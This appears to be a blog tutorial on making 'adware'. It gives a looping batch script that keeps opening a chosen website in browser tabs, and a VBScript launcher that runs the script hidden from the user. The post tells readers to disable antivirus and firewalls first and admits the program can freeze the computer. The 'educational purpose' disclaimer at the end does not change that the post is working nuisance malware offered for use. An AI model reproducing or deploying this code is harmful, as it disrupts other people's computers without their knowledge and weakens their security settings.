How to Make an Adware?
Read the first part of this malicious application developing tutorial : How to make a virus using notepad ?
Whats is an Adware ?
Basically adware are categorized under malware programs ! Those can really harm your privacy and computer.An adware can promote either a product or a website of a certain group or a person.Most of the adware are entered to computers through unverified installations.So Anti-Virus programs do keep a special eye on strange setup programs you install on your computer.
Anyhow the adware that we gonna make is not that harmfull..its just a DOS prompting application that can open number of web browser tabs which will load a specified web address in all of tabs
How to Creat ?Disable all of your Virus guards before making and launching the adware program.If the program still dont work try disabling any Firewalls too.
@echo off :loop start http://www.maiacc.blogspot.com goto loop http://www.maiacc.blogspot.com
- Change the blue colored web address to a web address that you want to be loades with the adware
- Save the file as adware.bat . The .bat part is important !
- There you !! , launch the program and check
- Just click on the Close button in Command Prompt window
- this is just a simple code and the start function launches the web site though your default web browser
- The loop function performs the same functions above this continuously till the program is closed
Well,I knew that you will search for this option ! This isn’t easy,that means you have to create another file (Windows Script Host) to launch the adware in hidden mode.Follow me
- Open another notepad window
- copy and paste the code below and change the “adware.bat” text to the name of your last saved batch file.
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "adware.bat" & Chr(34), 0
Set WshShell = Nothing
- Now save this document as Launcher.vbs.the .vbs part is important
- Now place both adware.bat and launcher.vbs files in same place and run the Launcher.vbs
- Umm…Remember that this may freeze your computer
- Open Task Manager
- Go to process tab and End Command Prompt Process !
Note : This information is only for Educational purpose .Adware and all other malware programs do kill the computer safety and usability
No comments:
Post a Comment